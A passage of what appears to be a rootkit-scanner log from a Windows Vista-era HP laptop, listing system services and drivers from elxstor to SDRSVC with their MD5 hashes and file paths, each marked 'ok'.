18:04:04.0285 5696 elxstor - ok
18:04:04.0324 5696 [ 4E6B23DFC917EA39306B529B773950F4 ] EMDMgmt C:\Windows\system32\emdmgmt.dll
18:04:04.0397 5696 EMDMgmt - ok
18:04:04.0432 5696 [ 67058C46504BC12D821F38CF99B7B28F ] EventSystem C:\Windows\system32\es.dll
18:04:04.0502 5696 EventSystem - ok
18:04:04.0549 5696 [ 22B408651F9123527BCEE54B4F6C5CAE ] exfat C:\Windows\system32\drivers\exfat.sys
18:04:04.0596 5696 exfat - ok
18:04:04.0643 5696 [ 1E9B9A70D332103C52995E957DC09EF8 ] fastfat C:\Windows\system32\drivers\fastfat.sys
18:04:04.0705 5696 fastfat - ok
18:04:04.0767 5696 [ 63BDADA84951B9C03E641800E176898A ] fdc C:\Windows\system32\DRIVERS\fdc.sys
18:04:04.0814 5696 fdc - ok
18:04:04.0845 5696 [ 6629B5F0E98151F4AFDD87567EA32BA3 ] fdPHost C:\Windows\system32\fdPHost.dll
18:04:04.0877 5696 fdPHost - ok
18:04:04.0908 5696 [ 89ED56DCE8E47AF40892778A5BD31FD2 ] FDResPub C:\Windows\system32\fdrespub.dll
18:04:04.0939 5696 FDResPub - ok
18:04:04.0970 5696 [ A8C0139A884861E3AAE9CFE73B208A9F ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
18:04:04.0986 5696 FileInfo - ok
18:04:05.0017 5696 [ 0AE429A696AECBC5970E3CF2C62635AE ] Filetrace C:\Windows\system32\drivers\filetrace.sys
18:04:05.0058 5696 Filetrace - ok
18:04:05.0088 5696 [ 6603957EFF5EC62D25075EA8AC27DE68 ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys
18:04:05.0158 5696 flpydisk - ok
18:04:05.0188 5696 [ 01334F9EA68E6877C4EF05D3EA8ABB05 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
18:04:05.0218 5696 FltMgr - ok
18:04:05.0278 5696 [ 8CE364388C8ECA59B14B539179276D44 ] FontCache C:\Windows\system32\FntCache.dll
18:04:05.0348 5696 FontCache - ok
18:04:05.0438 5696 [ C7FBDD1ED42F82BFA35167A5C9803EA3 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
18:04:05.0458 5696 FontCache3.0.0.0 - ok
18:04:05.0478 5696 [ B972A66758577E0BFD1DE0F91AAA27B5 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
18:04:05.0548 5696 Fs_Rec - ok
18:04:05.0568 5696 [ 4E1CD0A45C50A8882616CAE5BF82F3C5 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
18:04:05.0588 5696 gagp30kx - ok
18:04:05.0638 5696 [ 8182FF89C65E4D38B2DE4BB0FB18564E ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
18:04:05.0658 5696 GEARAspiWDM - ok
18:04:05.0708 5696 [ CD5D0AEEE35DFD4E986A5AA1500A6E66 ] gpsvc C:\Windows\System32\gpsvc.dll
18:04:05.0778 5696 gpsvc - ok
18:04:05.0828 5696 [ 88A78635B41ED4B261365FADEB28FE81 ] HBtnKey C:\Windows\system32\DRIVERS\cpqbttn.sys
18:04:05.0858 5696 HBtnKey - ok
18:04:05.0898 5696 [ CB04C744BE0A61B1D648FAED182C3B59 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
18:04:05.0978 5696 HdAudAddService - ok
18:04:06.0008 5696 [ 062452B7FFD68C8C042A6261FE8DFF4A ] HDAudBus C:\Windows\system32\DRIVERS\HDAudBus.sys
18:04:06.0058 5696 HDAudBus - ok
18:04:06.0098 5696 [ 1338520E78D90154ED6BE8F84DE5FCEB ] HidBth C:\Windows\system32\drivers\hidbth.sys
18:04:06.0158 5696 HidBth - ok
18:04:06.0178 5696 [ FF3160C3A2445128C5A6D9B076DA519E ] HidIr C:\Windows\system32\drivers\hidir.sys
18:04:06.0228 5696 HidIr - ok
18:04:06.0258 5696 [ 84067081F3318162797385E11A8F0582 ] hidserv C:\Windows\system32\hidserv.dll
18:04:06.0288 5696 hidserv - ok
18:04:06.0338 5696 [ CCA4B519B17E23A00B826C55716809CC ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys
18:04:06.0388 5696 HidUsb - ok
18:04:06.0408 5696 [ D8AD255B37DA92434C26E4876DB7D418 ] hkmsvc C:\Windows\system32\kmsvc.dll
18:04:06.0458 5696 hkmsvc - ok
18:04:06.0478 5696 [ DF353B401001246853763C4B7AAA6F50 ] HpCISSs C:\Windows\system32\drivers\hpcisss.sys
18:04:06.0498 5696 HpCISSs - ok
18:04:06.0528 5696 [ 64637B65C90DF48C94BB9346AFB3AC61 ] hpdskflt C:\Windows\system32\DRIVERS\hpdskflt.sys
18:04:06.0548 5696 hpdskflt - ok
18:04:06.0608 5696 [ FDF273A845F1FFCCEADF363AAF47582F ] hpqwmiex C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
18:04:06.0628 5696 hpqwmiex - ok
18:04:06.0638 5696 [ DB8CF923DFD8DD336BEA7F439A627858 ] hpsrv C:\Windows\system32\Hpservice.exe
18:04:06.0648 5696 hpsrv - ok
18:04:06.0678 5696 [ 0EEECA26C8D4BDE2A4664DB058A81937 ] HTTP C:\Windows\system32\drivers\HTTP.sys
18:04:06.0735 5696 HTTP - ok
18:04:06.0746 5696 hwdatacard - ok
18:04:06.0770 5696 [ 324C2152FF2C61ABAE92D09F3CCA4D63 ] i2omp C:\Windows\system32\drivers\i2omp.sys
18:04:06.0787 5696 i2omp - ok
18:04:06.0829 5696 [ 22D56C8184586B7A1F6FA60BE5F5A2BD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
18:04:06.0871 5696 i8042prt - ok
18:04:06.0910 5696 [ C957BF4B5D80B46C5017BF0101E6C906 ] iaStorV C:\Windows\system32\drivers\iastorv.sys
18:04:06.0936 5696 iaStorV - ok
18:04:07.0005 5696 [ 98477B08E61945F974ED9FDC4CB6BDAB ] idsvc C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
18:04:07.0088 5696 idsvc - ok
18:04:07.0170 5696 [ 0391268713612372E4E0ECEAADAD41D5 ] igfx C:\Windows\system32\DRIVERS\igdkmd32.sys
18:04:07.0334 5696 igfx - ok
18:04:07.0356 5696 [ 2D077BF86E843F901D8DB709C95B49A5 ] iirsp C:\Windows\system32\drivers\iirsp.sys
18:04:07.0379 5696 iirsp - ok
18:04:07.0421 5696 [ 9908D8A397B76CD8D31D0D383C5773C9 ] IKEEXT C:\Windows\System32\ikeext.dll
18:04:07.0496 5696 IKEEXT - ok
18:04:07.0522 5696 [ 97469037714070E45194ED318D636401 ] intelide C:\Windows\system32\drivers\intelide.sys
18:04:07.0543 5696 intelide - ok
18:04:07.0566 5696 [ 224191001E78C89DFA78924C3EA595FF ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
18:04:07.0629 5696 intelppm - ok
18:04:07.0700 5696 [ 9AC218C6E6105477484C6FDBE7D409A4 ] IPBusEnum C:\Windows\system32\ipbusenum.dll
18:04:07.0762 5696 IPBusEnum - ok
18:04:07.0809 5696 [ 62C265C38769B864CB25B4BCF62DF6C3 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
18:04:07.0856 5696 IpFilterDriver - ok
18:04:07.0887 5696 [ 1998BD97F950680BB55F55A7244679C2 ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
18:04:07.0949 5696 iphlpsvc - ok
18:04:07.0949 5696 IpInIp - ok
18:04:07.0980 5696 [ 40F34F8ABA2A015D780E4B09138B6C17 ] IPMIDRV C:\Windows\system32\drivers\ipmidrv.sys
18:04:08.0043 5696 IPMIDRV - ok
18:04:08.0074 5696 [ 8793643A67B42CEC66490B2A0CF92D68 ] IPNAT C:\Windows\system32\DRIVERS\ipnat.sys
18:04:08.0121 5696 IPNAT - ok
18:04:08.0183 5696 [ E6BE7A41A28D8F2DB174957454D32448 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
18:04:08.0324 5696 iPod Service - ok
18:04:08.0394 5696 [ 109C0DFB82C3632FBD11949B73AEEAC9 ] IRENUM C:\Windows\system32\drivers\irenum.sys
18:04:08.0454 5696 IRENUM - ok
18:04:08.0494 5696 [ 350FCA7E73CF65BCEF43FAE1E4E91293 ] isapnp C:\Windows\system32\drivers\isapnp.sys
18:04:08.0514 5696 isapnp - ok
18:04:08.0544 5696 [ 232FA340531D940AAC623B121A595034 ] iScsiPrt C:\Windows\system32\DRIVERS\msiscsi.sys
18:04:08.0564 5696 iScsiPrt - ok
18:04:08.0584 5696 [ BCED60D16156E428F8DF8CF27B0DF150 ] iteatapi C:\Windows\system32\drivers\iteatapi.sys
18:04:08.0614 5696 iteatapi - ok
18:04:08.0634 5696 [ 06FA654504A498C30ADCA8BEC4E87E7E ] iteraid C:\Windows\system32\drivers\iteraid.sys
18:04:08.0654 5696 iteraid - ok
18:04:08.0684 5696 [ 37605E0A8CF00CBBA538E753E4344C6E ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
18:04:08.0704 5696 kbdclass - ok
18:04:08.0744 5696 [ EDE59EC70E25C24581ADD1FBEC7325F7 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
18:04:08.0804 5696 kbdhid - ok
18:04:08.0834 5696 [ A3E186B4B935905B829219502557314E ] KeyIso C:\Windows\system32\lsass.exe
18:04:08.0904 5696 KeyIso - ok
18:04:08.0934 5696 [ 4A1445EFA932A3BAF5BDB02D7131EE20 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
18:04:08.0984 5696 KSecDD - ok
18:04:09.0064 5696 [ 8078F8F8F7A79E2E6B494523A828C585 ] KtmRm C:\Windows\system32\msdtckrm.dll
18:04:09.0124 5696 KtmRm - ok
18:04:09.0174 5696 [ 1BF5EEBFD518DD7298434D8C862F825D ] LanmanServer C:\Windows\system32\srvsvc.dll
18:04:09.0234 5696 LanmanServer - ok
18:04:09.0264 5696 [ 1DB69705B695B987082C8BAEC0C6B34F ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
18:04:09.0314 5696 LanmanWorkstation - ok
18:04:09.0334 5696 [ D1C5883087A0C3F1344D9D55A44901F6 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
18:04:09.0394 5696 lltdio - ok
18:04:09.0434 5696 [ 2D5A428872F1442631D0959A34ABFF63 ] lltdsvc C:\Windows\System32\lltdsvc.dll
18:04:09.0494 5696 lltdsvc - ok
18:04:09.0534 5696 [ 35D40113E4A5B961B6CE5C5857702518 ] lmhosts C:\Windows\System32\lmhsvc.dll
18:04:09.0584 5696 lmhosts - ok
18:04:09.0634 5696 [ A2262FB9F28935E862B4DB46438C80D2 ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
18:04:09.0654 5696 LSI_FC - ok
18:04:09.0664 5696 [ 30D73327D390F72A62F32C103DAF1D6D ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
18:04:09.0684 5696 LSI_SAS - ok
18:04:09.0694 5696 [ E1E36FEFD45849A95F1AB81DE0159FE3 ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
18:04:09.0714 5696 LSI_SCSI - ok
18:04:09.0754 5696 [ 23B55D27A0AFB7FE9CBCB20B617CC168 ] Ltn_stk7070P C:\Windows\system32\DRIVERS\Ltn_stk7070P.sys
18:04:09.0854 5696 Ltn_stk7070P - ok
18:04:09.0904 5696 [ 1FA7503D019291C027FEDAE509BC5500 ] Ltn_stkrc C:\Windows\system32\DRIVERS\Ltn_stkrc.sys
18:04:09.0964 5696 Ltn_stkrc - ok
18:04:09.0994 5696 [ 8F5C7426567798E62A3B3614965D62CC ] luafv C:\Windows\system32\drivers\luafv.sys
18:04:10.0024 5696 luafv - ok
18:04:10.0044 5696 [ D153B14FC6598EAE8422A2037553ADCE ] megasas C:\Windows\system32\drivers\megasas.sys
18:04:10.0064 5696 megasas - ok
18:04:10.0094 5696 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] MMCSS C:\Windows\system32\mmcss.dll
18:04:10.0154 5696 MMCSS - ok
18:04:10.0204 5696 [ E13B5EA0F51BA5B1512EC671393D09BA ] Modem C:\Windows\system32\drivers\modem.sys
18:04:10.0254 5696 Modem - ok
18:04:10.0304 5696 [ 0A9BB33B56E294F686ABB7C1E4E2D8A8 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
18:04:10.0354 5696 monitor - ok
18:04:10.0384 5696 [ 5BF6A1326A335C5298477754A506D263 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
18:04:10.0404 5696 mouclass - ok
18:04:10.0424 5696 [ 93B8D4869E12CFBE663915502900876F ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
18:04:10.0464 5696 mouhid - ok
18:04:10.0494 5696 [ BDAFC88AA6B92F7842416EA6A48E1600 ] MountMgr C:\Windows\system32\drivers\mountmgr.sys
18:04:10.0524 5696 MountMgr - ok
18:04:10.0614 5696 [ 51A84B690DF519DCF656F780243D953E ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
18:04:10.0654 5696 MozillaMaintenance - ok
18:04:10.0694 5696 [ 583A41F26278D9E0EA548163D6139397 ] mpio C:\Windows\system32\drivers\mpio.sys
18:04:10.0714 5696 mpio - ok
18:04:10.0744 5696 [ 22241FEBA9B2DEFA669C8CB0A8DD7D2E ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
18:04:10.0784 5696 mpsdrv - ok
18:04:10.0834 5696 [ 5DE62C6E9108F14F6794060A9BDECAEC ] MpsSvc C:\Windows\system32\mpssvc.dll
18:04:10.0874 5696 MpsSvc - ok
18:04:10.0894 5696 [ 4FBBB70D30FD20EC51F80061703B001E ] Mraid35x C:\Windows\system32\drivers\mraid35x.sys
18:04:10.0914 5696 Mraid35x - ok
18:04:10.0944 5696 [ 82CEA0395524AACFEB58BA1448E8325C ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
18:04:10.0974 5696 MRxDAV - ok
18:04:11.0004 5696 [ 1E94971C4B446AB2290DEB71D01CF0C2 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
18:04:11.0074 5696 mrxsmb - ok
18:04:11.0144 5696 [ 4FCCB34D793B116423209C0F8B7A3B03 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
18:04:11.0194 5696 mrxsmb10 - ok
18:04:11.0204 5696 [ C3CB1B40AD4A0124D617A1199B0B9D7C ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
18:04:11.0254 5696 mrxsmb20 - ok
18:04:11.0284 5696 [ 5457DCFA7C0DA43522F4D9D4049C1472 ] msahci C:\Windows\system32\drivers\msahci.sys
18:04:11.0304 5696 msahci - ok
18:04:11.0334 5696 [ 3FC82A2AE4CC149165A94699183D3028 ] msdsm C:\Windows\system32\drivers\msdsm.sys
18:04:11.0354 5696 msdsm - ok
18:04:11.0384 5696 [ FD7520CC3A80C5FC8C48852BB24C6DED ] MSDTC C:\Windows\System32\msdtc.exe
18:04:11.0424 5696 MSDTC - ok
18:04:11.0454 5696 [ A9927F4A46B816C92F461ACB90CF8515 ] Msfs C:\Windows\system32\drivers\Msfs.sys
18:04:11.0484 5696 Msfs - ok
18:04:11.0504 5696 [ 0F400E306F385C56317357D6DEA56F62 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
18:04:11.0514 5696 msisadrv - ok
18:04:11.0544 5696 [ 85466C0757A23D9A9AECDC0755203CB2 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
18:04:11.0594 5696 MSiSCSI - ok
18:04:11.0604 5696 msiserver - ok
18:04:11.0624 5696 [ D8C63D34D9C9E56C059E24EC7185CC07 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
18:04:11.0674 5696 MSKSSRV - ok
18:04:11.0704 5696 [ 1D373C90D62DDB641D50E55B9E78D65E ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
18:04:11.0737 5696 MSPCLOCK - ok
18:04:11.0743 5696 [ B572DA05BF4E098D4BBA3A4734FB505B ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
18:04:11.0791 5696 MSPQM - ok
18:04:11.0849 5696 [ B49456D70555DE905C311BCDA6EC6ADB ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
18:04:11.0886 5696 MsRPC - ok
18:04:11.0909 5696 [ E384487CB84BE41D09711C30CA79646C ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys
18:04:11.0925 5696 mssmbios - ok
18:04:11.0935 5696 [ 7199C1EEC1E4993CAF96B8C0A26BD58A ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
18:04:11.0984 5696 MSTEE - ok
18:04:12.0005 5696 [ 6A57B5733D4CB702C8EA4542E836B96C ] Mup C:\Windows\system32\Drivers\mup.sys
18:04:12.0027 5696 Mup - ok
18:04:12.0053 5696 [ E4EAF0C5C1B41B5C83386CF212CA9584 ] napagent C:\Windows\system32\qagentRT.dll
18:04:12.0097 5696 napagent - ok
18:04:12.0130 5696 [ 85C44FDFF9CF7E72A40DCB7EC06A4416 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
18:04:12.0158 5696 NativeWifiP - ok
18:04:12.0215 5696 [ 1357274D1883F68300AEADD15D7BBB42 ] NDIS C:\Windows\system32\drivers\ndis.sys
18:04:12.0249 5696 NDIS - ok
18:04:12.0270 5696 [ 0E186E90404980569FB449BA7519AE61 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
18:04:12.0315 5696 NdisTapi - ok
18:04:12.0341 5696 [ D6973AA34C4D5D76C0430B181C3CD389 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
18:04:12.0385 5696 Ndisuio - ok
18:04:12.0405 5696 [ 818F648618AE34F729FDB47EC68345C3 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
18:04:12.0453 5696 NdisWan - ok
18:04:12.0479 5696 [ 71DAB552B41936358F3B541AE5997FB3 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
18:04:12.0524 5696 NDProxy - ok
18:04:12.0543 5696 [ BCD093A5A6777CF626434568DC7DBA78 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
18:04:12.0576 5696 NetBIOS - ok
18:04:12.0607 5696 [ ECD64230A59CBD93C85F1CD1CAB9F3F6 ] netbt C:\Windows\system32\DRIVERS\netbt.sys
18:04:12.0664 5696 netbt - ok
18:04:12.0692 5696 [ A3E186B4B935905B829219502557314E ] Netlogon C:\Windows\system32\lsass.exe
18:04:12.0707 5696 Netlogon - ok
18:04:12.0739 5696 [ C8052711DAECC48B982434C5116CA401 ] Netman C:\Windows\System32\netman.dll
18:04:12.0799 5696 Netman - ok
18:04:12.0827 5696 [ 2EF3BBE22E5A5ACD1428EE387A0D0172 ] netprofm C:\Windows\System32\netprofm.dll
18:04:12.0878 5696 netprofm - ok
18:04:12.0913 5696 [ D6C4E4A39A36029AC0813D476FBD0248 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
18:04:12.0943 5696 NetTcpPortSharing - ok
18:04:13.0121 5696 [ 8DE67BD902095A13329FD82C85A1FA09 ] NETw5v32 C:\Windows\system32\DRIVERS\NETw5v32.sys
18:04:13.0474 5696 NETw5v32 - ok
18:04:13.0505 5696 [ 2E7FB731D4790A1BC6270ACCEFACB36E ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
18:04:13.0537 5696 nfrd960 - ok
18:04:13.0568 5696 [ 2997B15415F9BBE05B5A4C1C85E0C6A2 ] NlaSvc C:\Windows\System32\nlasvc.dll
18:04:13.0646 5696 NlaSvc - ok
18:04:13.0677 5696 [ D36F239D7CCE1931598E8FB90A0DBC26 ] Npfs C:\Windows\system32\drivers\Npfs.sys
18:04:13.0724 5696 Npfs - ok
18:04:13.0771 5696 [ 8BB86F0C7EEA2BDED6FE095D0B4CA9BD ] nsi C:\Windows\system32\nsisvc.dll
18:04:13.0786 5696 nsi - ok
18:04:13.0817 5696 [ 609773E344A97410CE4EBF74A8914FCF ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
18:04:13.0880 5696 nsiproxy - ok
18:04:13.0958 5696 [ 6A4A98CEE84CF9E99564510DDA4BAA47 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
18:04:14.0020 5696 Ntfs - ok
18:04:14.0067 5696 [ E875C093AEC0C978A90F30C9E0DFBB72 ] ntrigdigi C:\Windows\system32\drivers\ntrigdigi.sys
18:04:14.0114 5696 ntrigdigi - ok
18:04:14.0161 5696 [ C5DBBCDA07D780BDA9B685DF333BB41E ] Null C:\Windows\system32\drivers\Null.sys
18:04:14.0207 5696 Null - ok
18:04:14.0239 5696 [ E69E946F80C1C31C53003BFBF50CBB7C ] nvraid C:\Windows\system32\drivers\nvraid.sys
18:04:14.0254 5696 nvraid - ok
18:04:14.0285 5696 [ 9E0BA19A28C498A6D323D065DB76DFFC ] nvstor C:\Windows\system32\drivers\nvstor.sys
18:04:14.0301 5696 nvstor - ok
18:04:14.0317 5696 [ 07C186427EB8FCC3D8D7927187F260F7 ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
18:04:14.0332 5696 nv_agp - ok
18:04:14.0348 5696 NwlnkFlt - ok
18:04:14.0348 5696 NwlnkFwd - ok
18:04:14.0379 5696 [ BE32DA025A0BE1878F0EE8D6D9386CD5 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
18:04:14.0439 5696 ohci1394 - ok
18:04:14.0479 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2pimsvc C:\Windows\system32\p2psvc.dll
18:04:14.0569 5696 p2pimsvc - ok
18:04:14.0579 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2psvc C:\Windows\system32\p2psvc.dll
18:04:14.0609 5696 p2psvc - ok
18:04:14.0719 5696 [ 0FA9B5055484649D63C303FE404E5F4D ] Parport C:\Windows\system32\drivers\parport.sys
18:04:14.0809 5696 Parport - ok
18:04:14.0869 5696 [ B9C2B89F08670E159F7181891E449CD9 ] partmgr C:\Windows\system32\drivers\partmgr.sys
18:04:14.0889 5696 partmgr - ok
18:04:14.0899 5696 [ 4F9A6A8A31413180D0FCB279AD5D8112 ] Parvdm C:\Windows\system32\drivers\parvdm.sys
18:04:14.0959 5696 Parvdm - ok
18:04:14.0989 5696 [ C6276AD11F4BB49B58AA1ED88537F14A ] PcaSvc C:\Windows\System32\pcasvc.dll
18:04:15.0039 5696 PcaSvc - ok
18:04:15.0059 5696 [ 941DC1D19E7E8620F40BBC206981EFDB ] pci C:\Windows\system32\drivers\pci.sys
18:04:15.0119 5696 pci - ok
18:04:15.0149 5696 [ 3B1901E401473E03EB8C874271E50C26 ] pciide C:\Windows\system32\drivers\pciide.sys
18:04:15.0179 5696 pciide - ok
18:04:15.0199 5696 [ E6F3FB1B86AA519E7698AD05E58B04E5 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
18:04:15.0229 5696 pcmcia - ok
18:04:15.0279 5696 [ 6349F6ED9C623B44B52EA3C63C831A92 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
18:04:15.0409 5696 PEAUTH - ok
18:04:15.0499 5696 [ B1689DF169143F57053F795390C99DB3 ] pla C:\Windows\system32\pla.dll
18:04:15.0609 5696 pla - ok
18:04:15.0659 5696 [ C5E7F8A996EC0A82D508FD9064A5569E ] PlugPlay C:\Windows\system32\umpnpmgr.dll
18:04:15.0679 5696 PlugPlay - ok
18:04:15.0709 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPAutoReg C:\Windows\system32\p2psvc.dll
18:04:15.0739 5696 PNRPAutoReg - ok
18:04:15.0759 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPsvc C:\Windows\system32\p2psvc.dll
18:04:15.0779 5696 PNRPsvc - ok
18:04:15.0849 5696 [ D0494460421A03CD5225CCA0059AA146 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
18:04:15.0909 5696 PolicyAgent - ok
18:04:15.0959 5696 [ ECFFFAEC0C1ECD8DBC77F39070EA1DB1 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
18:04:15.0999 5696 PptpMiniport - ok
18:04:16.0029 5696 [ 0E3CEF5D28B40CF273281D620C50700A ] Processor C:\Windows\system32\drivers\processr.sys
18:04:16.0099 5696 Processor - ok
18:04:16.0149 5696 [ 0508FAA222D28835310B7BFCA7A77346 ] ProfSvc C:\Windows\system32\profsvc.dll
18:04:16.0169 5696 ProfSvc - ok
18:04:16.0179 5696 [ A3E186B4B935905B829219502557314E ] ProtectedStorage C:\Windows\system32\lsass.exe
18:04:16.0199 5696 ProtectedStorage - ok
18:04:16.0239 5696 [ 99514FAA8DF93D34B5589187DB3AA0BA ] PSched C:\Windows\system32\DRIVERS\pacer.sys
18:04:16.0269 5696 PSched - ok
18:04:16.0329 5696 [ CCDAC889326317792480C0A67156A1EC ] ql2300 C:\Windows\system32\drivers\ql2300.sys
18:04:16.0389 5696 ql2300 - ok
18:04:16.0419 5696 [ 81A7E5C076E59995D54BC1ED3A16E60B ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
18:04:16.0439 5696 ql40xx - ok
18:04:16.0459 5696 [ E9ECAE663F47E6CB43962D18AB18890F ] QWAVE C:\Windows\system32\qwave.dll
18:04:16.0519 5696 QWAVE - ok
18:04:16.0549 5696 [ 9F5E0E1926014D17486901C88ECA2DB7 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
18:04:16.0569 5696 QWAVEdrv - ok
18:04:16.0589 5696 [ 147D7F9C556D259924351FEB0DE606C3 ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
18:04:16.0619 5696 RasAcd - ok
18:04:16.0649 5696 [ F6A452EB4CEADBB51C9E0EE6B3ECEF0F ] RasAuto C:\Windows\System32\rasauto.dll
18:04:16.0699 5696 RasAuto - ok
18:04:16.0739 5696 [ A214ADBAF4CB47DD2728859EF31F26B0 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
18:04:16.0789 5696 Rasl2tp - ok
18:04:16.0839 5696 [ 75D47445D70CA6F9F894B032FBC64FCF ] RasMan C:\Windows\System32\rasmans.dll
18:04:16.0883 5696 RasMan - ok
18:04:16.0915 5696 [ 509A98DD18AF4375E1FC40BC175F1DEF ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
18:04:16.0982 5696 RasPppoe - ok
18:04:16.0993 5696 [ 2005F4A1E05FA09389AC85840F0A9E4D ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
18:04:17.0038 5696 RasSstp - ok
18:04:17.0072 5696 [ B14C9D5B9ADD2F84F70570BBBFAA7935 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
18:04:17.0108 5696 rdbss - ok
18:04:17.0140 5696 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
18:04:17.0196 5696 RDPCDD - ok
18:04:17.0253 5696 [ E8BD98D46F2ED77132BA927FCCB47D8B ] rdpdr C:\Windows\system32\drivers\rdpdr.sys
18:04:17.0370 5696 rdpdr - ok
18:04:17.0379 5696 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
18:04:17.0422 5696 RDPENCDD - ok
18:04:17.0484 5696 [ C127EBD5AFAB31524662C48DFCEB773A ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
18:04:17.0550 5696 RDPWD - ok
18:04:17.0576 5696 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll
18:04:17.0612 5696 RemoteAccess - ok
18:04:17.0657 5696 [ 9E6894EA18DAFF37B63E1005F83AE4AB ] RemoteRegistry C:\Windows\system32\regsvc.dll
18:04:17.0703 5696 RemoteRegistry - ok
18:04:17.0735 5696 [ 6482707F9F4DA0ECBAB43B2E0398A101 ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
18:04:17.0767 5696 RFCOMM - ok
18:04:17.0792 5696 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe
18:04:17.0867 5696 RpcLocator - ok
18:04:17.0905 5696 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] RpcSs C:\Windows\system32\rpcss.dll
18:04:17.0943 5696 RpcSs - ok
18:04:17.0974 5696 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
18:04:18.0055 5696 rspndr - ok
18:04:18.0063 5696 [ A3E186B4B935905B829219502557314E ] SamSs C:\Windows\system32\lsass.exe
18:04:18.0082 5696 SamSs - ok
18:04:18.0130 5696 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
18:04:18.0159 5696 sbp2port - ok
18:04:18.0194 5696 [ 77B7A11A0C3D78D3386398FBBEA1B632 ] SCardSvr C:\Windows\System32\SCardSvr.dll
18:04:18.0250 5696 SCardSvr - ok
18:04:18.0308 5696 [ 1A58069DB21D05EB2AB58EE5753EBE8D ] Schedule C:\Windows\system32\schedsvc.dll
18:04:18.0402 5696 Schedule - ok
18:04:18.0417 5696 [ 312EC3E37A0A1F2006534913E37B4423 ] SCPolicySvc C:\Windows\System32\certprop.dll
18:04:18.0449 5696 SCPolicySvc - ok
18:04:18.0480 5696 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll
